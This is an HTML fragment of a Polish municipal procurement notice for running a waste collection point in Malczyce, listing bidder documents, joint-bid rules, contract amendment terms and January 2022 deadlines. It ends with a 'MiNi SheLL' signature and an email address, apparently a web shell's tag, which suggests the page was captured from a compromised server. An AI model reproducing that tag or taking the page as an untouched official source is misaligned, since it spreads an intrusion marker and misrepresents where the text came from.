(Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) aktualne zezwolenie na prowadzenie działalności w zakresie zbierania<br/>co najmniej odpadów, które będą przyjmowane do PSZOK-a, wydane przez właściwy organ zgodnie z<br/>ustawą o odpadach,<br/>2) aktualny wpis do rejestru działalności regulowanej Wójta Gminy Malczyce w zakresie zbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Malczyce, których rodzaj został określony w SWZ zgodnie z ustawą o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2020 r. poz.1439 ze zm.),<br/>3) dokument potwierdzający wpis do rejestru BDO (podmiotów wprowadzających produkty w opakowaniach i gospodarujących odpadami, o którym mowa w art.49 i 50 ustawy z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz.U. z 2020 r. poz.797 z późn. zm.)<br/>4) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną brutto nie mniejszą niż 200 000,00 PLN.<br/>5) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów) określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane (w przypadku usług powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy), z tym że wykażą przynajmniej 1 usługę w zakresie odbierania odpadów komunalnych o wartości nie mniejszej niż 60 000,00 PLN brutto. Wykaz powinien być sporządzony według wzoru stanowiącego załącznik nr 3 do SWZ.<br/>6) wykaz osób , skierowanych przez Wykonawcę do realizacji zamówienia tj. odpowiedzialnych za wykonywania m.in. następujących prac: odbiór, umieszczanie odpadów w kontenerach i pojemnikach,<br/>prowadzenie ewidencji odpadów, przygotowanie odpadów do transportu, przygotowywanie miesięcznych sprawozdań i protokołów - minimum 2 osoby.<br/>Wykaz powinien być sporządzony według wzoru stanowiącego załącznik nr 4 do SWZ.<br/>7) wykaz w zakresie dyspononowania odpowiednim do przedmiotu zamówienia (przygotowania PSZOK-a) terenem zlokalizowanym w granicach administracyjnych gminy Malczyce, spełniającymi<br/>wymagania przepisów budowlanych, sanitarnych i ochrony środowiska.<br/>Wykaz powinien być sporządzony według wzoru stanowiącego załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Formularz oferty - załącznik nr 1 do SWZ,<br/>2.Oświadczenie o spełnianiu warunków udziału w posterowani oraz braku podstaw do wykluczenia - załącznik nr 2 do SWZ,<br/>W przypadku wspólnego ubiegania się o zamówienie oświadczenie składa każdy z Wykonawców.<br/>3. Oświadczenie wykonawców z art.117 ,w przypadku wspólnego ubiegania się o zamówienie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4. Zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia – w przypadku gdy wykonawca polega na zasobach innych podmiotów w celu potwierdzenia spełnienia warunków udziału w postępowaniu,<br/>5. Upoważnienie osób podpisujących ofertę (jeżeli upoważnienie takie nie wynika wprost z odpisu z właściwego rejestru Wykonawcy) - do oferty należy dołączyć dokument ustanawiający pełnomocnika. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy dołączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców ubiegających się<br/>o zamówienie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków, zgodnie z zapisami niniejszej SWZ. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezen¬to¬wania ich w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego. Zaleca się aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo powinno być załączone do oferty.<br/>2. Od momentu otwarcia ofert wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunki udziału zostaną spełnione , jeżeli:<br/>1) żaden z Wykonawców występujących wspólnie nie będzie podlegać wykluczeniu z postępowania,<br/>2) łącznie wykażą spełnianie warunków udziału w postępowaniu.<br/>4. Oświadczenie o braku podstaw do wykluczenia i spełniania warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie , z którego wynika, które usługi wykonają poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) terminu wykonania umowy – wraz ze wszystkimi konsekwencjami, w wypadku: <br/>a) wystąpienia okoliczności leżących wyłącznie po stronie Zamawiającego powodujących konieczność zmiany terminu wykonania umowy;<br/>b) wystąpienia siły wyższej uniemożliwiającej wykonanie umowy w terminie, przy czym za siłę wyższą uznaje się wojnę, atak terrorystyczny, katastrofę, zamieszki, strajki, pożar, na które Strony nie mają wpływu, a które mają bezpośredni wpływ na wykonanie umowy;<br/>c) opóźnienia Wykonawcy w pozyskaniu niezbędnych do realizacji umowy uzgodnień, opinii, decyzji administracyjnych, konsultacji, zgód, ocen etc., przy czym opóźnienie to spowodowane może być jedynie okolicznościami niezależnymi od Wykonawcy;<br/>d) konieczności zmiany przedmiotu umowy lub sposobu wykonania umowy z przyczyn nieleżących po stronie Wykonawcy, a wynikających ze zmiany powszechnie lub miejscowo obowiązujących aktów normatywnych lub indywidualnych aktów normatywnych oraz uzgodnień, opinii i konsultacji bezpośrednio związanych z przedmiotem umowy, pod warunkiem, że<br/>wystąpienie okoliczności, o których mowa powyżej nie było możliwe do wcześniejszego przewidzenia, w szczególności za okoliczności takie strony poczytywać będą przedłużające się ponad normatywny czas czynności z udziałem organów administracji bądź innych podmiotów,<br/>których dokonanie jest niezbędne dla wykonania umowy, o ile Wykonawca zachował należytą staranność w toku tych czynności;<br/>e) dokonania innej dopuszczalnej istotnej zmiany umowy, o której mowa w niniejszym paragrafie skutkującej koniecznością zmiany terminu wykonania umowy;<br/>2) wynagrodzenia – wraz ze wszystkimi skutkami, w wypadku:<br/>a) konieczności zmiany przedmiotu umowy lub sposobu wykonania umowy z przyczyn nieleżących po stronie Wykonawcy, a wynikających ze zmiany powszechnie lub miejscowo obowiązujących aktów normatywnych lub indywidualnych aktów normatywnych oraz uzgodnień, opinii i konsultacji bezpośrednio związanych z przedmiotem umowy, pod warunkiem, że<br/>wystąpienie okoliczności, o których mowa powyżej nie było możliwe do wcześniejszego przewidzenia;<br/>b) wystąpienia lub ujawnienia okoliczności faktycznych skutkujących koniecznością zmiany sposobu lub warunków zapłaty wynagrodzenia z przyczyn nieleżących po stronie Wykonawcy;<br/>c) wystąpienia przesłanek waloryzacyjnych zgodnie z odrębnymi postanowieniami niniejszej umowy;<br/>d) dokonania innej dopuszczalnej zmiany umowy , o której mowa w niniejszym paragrafie, skutkującej koniecznością zmiany wysokości wynagrodzenia.<br/>3) przedmiotu umowy oraz sposobu wykonania umowy – wraz ze wszystkimi skutkami, w wypadku:<br/>a) wystąpienia lub ujawnienia okoliczności, które skutkują koniecznością korzystnej dla Zamawiającego zmiany przedmiotu lub sposobu wykonania umowy istotnej dla osiągnięcia zamierzonego przez Zamawiającego celu umowy,<br/>b) zmianie czynności składających się na przedmiot świadczenia wraz<br/>z ewentualną adekwatną zmianą wynagrodzenia oraz ewentualną zmianą terminu wykonania umowy;<br/>c) wystąpienia lub ujawnienia okoliczności nieleżących po stronie Wykonawcy, a wynikających ze zmiany powszechnie lub miejscowo obowiązujących aktów normatywnych lub indywidualnych aktów normatywnych oraz uzgodnień, opinii i konsultacji bezpośrednio związanych z przedmiotem umowy, pod warunkiem, że wystąpienie okoliczności, o których mowa powyżej nie<br/>było możliwe do wcześniejszego przewidzenia, w szczególności za okoliczności takie strony poczytywać będą przedłużające się ponad normatywny czas czynności z udziałem organów administracji bądź innych podmiotów lub zaistnienie konieczności dokonania innych – nowych<br/>czynności z udziałem organów administracji bądź innych podmiotów, których dokonanie jest niezbędne dla wykonania umowy, o ile Wykonawca zachował należytą staranność w toku tych czynności;<br/>4) zmiany osób, wyznaczonych przez Wykonawcę do wykonania zamówienia, jeżeli: - zmiana tych osób stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy, - <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://malczyce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-03 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-01</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com